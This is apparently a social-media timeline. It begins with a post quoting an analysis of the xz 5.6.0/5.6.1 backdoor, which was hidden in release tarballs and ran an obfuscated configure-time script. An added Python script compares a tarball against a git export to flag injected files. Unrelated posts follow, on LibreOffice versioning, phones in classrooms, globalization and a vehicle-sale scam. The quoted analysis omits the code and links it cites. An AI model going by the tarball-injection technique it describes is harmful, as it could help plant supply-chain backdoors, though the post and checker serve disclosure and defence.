Looks like we have a new #xz vulnerability (backdoor):
XZ Struck By Malicious Code That Could Allow Unauthorized Remote System Access
Red Hat today issued an "urgent security alert" for Fedora 41 and Fedora Rawhide users over XZ. Yes, the XZ tools and libraries for this compression format. Some malicious code was added to XZ 5.6.0/5.6.1 that could allow unauthorized remote system access.
Red Hat cites CVE-2024-3094 for this XZ security vulnerability due to malicious code making it into the codebase. I haven't seen CVE-2024-3094 made public yet but the Red Hat security alert sums it up as…
[quote]One portion of the backdoor is solely in the distributed tarballs. For easier reference, here's a link to debian's import of the tarball, but it is also present in the tarballs for 5.6.0 and 5.6.1:
That line is *not* in the upstream source of build-to-host, nor is build-to-host used by xz in git. However, it is present in the tarballs released upstream, except for the "source code" links, which I think github generates directly from the repository contents:
This injects an obfuscated script to be executed at the end of configure. This script is fairly obfuscated and uses data from "test" .xz files in the repository.
This script is executed and, if some preconditions match, modifies $builddir/src/liblzma/Makefile to contain
Note that the files were not even used for any "tests" in 5.6.0.
Subsequently the injected code (more about that below) caused valgrind errors and crashes in some configurations, due to the stack layout differing from what the backdoor was expecting. These issues were attempted to be worked around in 5.6.1:
Given the activity over several weeks, the committer is either directly involved or there was some quite severe compromise of their system. Unfortunately the latter looks like the less likely explanation, given they communicated on various lists about the "fixes" mentioned above.
Florian Weimer first extracted the injected code in isolation, also attached, liblzma_la-crc64-fast.o, I had only looked at the whole binary. Thanks![/quote]
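The quoted analysis hinges on one detail: the hook lived only in the distributed tarball, not in the git tree. The check a packager wants from that is a drift report between a release tarball and an export of the repository at the same tag. The script below is an added example, not code from the quoted post or from the xz project; it compares two tar archives, strips their differing top-level prefixes, and reports paths that exist only in the tarball, paths only in the source export, and paths whose contents differ. Autotools releases legitimately ship generated files such as configure, so the report also separates an "unexpected" list from an allowlist of expected generated names (EXPECTED_GENERATED is an assumption you would tune per project). Both archives and all file contents are constructed in memory for the demo.

```python
"""Drift check between a release tarball and a source export (added example)."""
import hashlib
import io
import tarfile

# Assumed allowlist of files that autotools legitimately adds to a tarball
# but that are not committed to git. Tune per project.
EXPECTED_GENERATED = {"configure", "Makefile.in", "aclocal.m4", "config.h.in"}


def _sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def archive_digests(archive: bytes) -> dict[str, str]:
    """Map each regular file's path (top-level directory stripped) to the
    SHA-256 of its contents. Release tarballs and `git archive` output use
    different prefixes (e.g. proj-1.0/ vs proj/), so paths are compared
    below that prefix."""
    digests = {}
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            path = member.name.split("/", 1)[1] if "/" in member.name else member.name
            with tar.extractfile(member) as fh:
                digests[path] = _sha256(fh.read())
    return digests


def compare_release_to_source(tarball: bytes, source: bytes) -> dict[str, list[str]]:
    """Report how the release tarball differs from the repository export.
    Everything is returned sorted so the output is stable and diffable."""
    rel = archive_digests(tarball)
    src = archive_digests(source)
    only_in_tarball = sorted(set(rel) - set(src))
    return {
        "only_in_tarball": only_in_tarball,
        # Additions that are neither committed nor expected build output
        # deserve a human look: this is where an injected m4/script would show up.
        "unexpected_in_tarball": [p for p in only_in_tarball if p not in EXPECTED_GENERATED],
        "only_in_source": sorted(set(src) - set(rel)),
        "modified": sorted(p for p in rel.keys() & src.keys() if rel[p] != src[p]),
    }


def build_archive(prefix: str, files: dict[str, bytes]) -> bytes:
    """Construct an in-memory .tar.gz (demo input only, not a real release)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(f"{prefix}/{name}")
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed sample trees. The "source" is what the repository contains; the
# "release" adds expected autoconf output, an extra m4 file that is not in git,
# and a modified Makefile.am.
SOURCE_FILES = {
    "configure.ac": b"AC_INIT([demo], [1.0])\n",
    "src/lib/Makefile.am": b"lib_LTLIBRARIES = libdemo.la\n",
}
RELEASE_FILES = {
    "configure.ac": b"AC_INIT([demo], [1.0])\n",
    "src/lib/Makefile.am": b"lib_LTLIBRARIES = libdemo.la\n# extra line\n",
    "m4/build-helper.m4": b"dnl placeholder helper macro (constructed)\n",
    "configure": b"#!/bin/sh\n# generated by autoconf\n",
}


def demo() -> dict[str, list[str]]:
    return compare_release_to_source(
        build_archive("demo-1.0", RELEASE_FILES),
        build_archive("demo", SOURCE_FILES),
    )


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

On a real release you would feed `compare_release_to_source` the downloaded tarball bytes and the bytes of `git archive <tag>` for the same version; a non-empty "unexpected_in_tarball" or "modified" list is the signal to diff those files by hand before packaging.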
@rafal06@fluffykittycat They're making their products shittier to attempt to get the consumer to pay more, to appease the shareholders—their true customers—by increasing profit margins. Unfortunately for them, that doesn't work on informed consumers, of which there are plenty thanks to the free flow of information on the Internet. :)
#LibreOffice has changed its numbering system to a YY.M format instead. The first of the new system is LibreOffice 24.2. The last of the old system is 7.6.4.
“In Canada and other developed countries, scores in reading, math and science are on a steady decline,” said Maharaj.
“When [scientists] look at what’s contributing to this, the use of phones and digital technology is a significant factor.”
Cris Rowan, a B.C.-based occupational therapist, added that phone use is impacting children's brain development and impacting their focus in class.
“Research is showing that grades are directly related to the number of times you open a text.... Even having that phone on the desk is hugely affecting kids.”
Both experts say cellphones in class are also likely contributing to an ongoing decrease in kid and teen mental health.
Experts also say that cellphones in class have a negative impact by increasing opportunities for cyberbullying.
tk (tk@f.kawa-kun.com)'s status on Monday, 01-Jan-2024 11:28:21 JST
tk ♲ @rebelhq@diasporasocial.net: Globalization is Crumbling: Time for Domestic Self-Sufficiency in 2024 www.counterpunch.org/2023/12/2… The decades-long attempt to force "globalization" as the primary economic model is crumbling. We saw it coming when the pandemic hit and suddenly "global supply chains" failed, leaving those relying on them in dire straits. Now, as clusters of war spread across the planet, once again the supply chains are broken like the fragile, artificial constructs they are.
@SebinNyshkim I feel like this is unfortunately the logical continuation of things like:
Automation in general, in both robotic and software forms
Things being turned into unmaintainable/unrepairable black boxes
Automatic transmissions in cars
The people producing and pushing this stuff want us to become slaves to them rather than learning how to do things ourselves. It's definitely "working," too, because much of the population is too scared to work on their own things, and is even scared of "having to use" hand/power tools to do anything.
@RedForkian The funny thing is that point-and-shoot cameras are smaller than today's smartphones, so you might as well start carrying one if you don't want all of the smartphone surveillance and other nonsense.
An Ottawa woman is warning people who are selling their vehicle to be wary of scammers who try to lure sellers into purchasing vehicle history reports through fraudulent websites in order to obtain their credit card information.
Ellen Thompson says she was encouraged by the large number of responses to an ad she posted on AutoTrader to sell her son's 2011 Honda CR-Z.
"The first day I was inundated with interested people and I thought 'Oh, this is crazy,'" says Thompson. "I couldn't even keep up to the interest."
Thompson had already paid for a vehicle history report for the pending sale, but she estimates nine out of every 10 text messages she received from potential buyers led to the same request for a vehicle history report from a different company.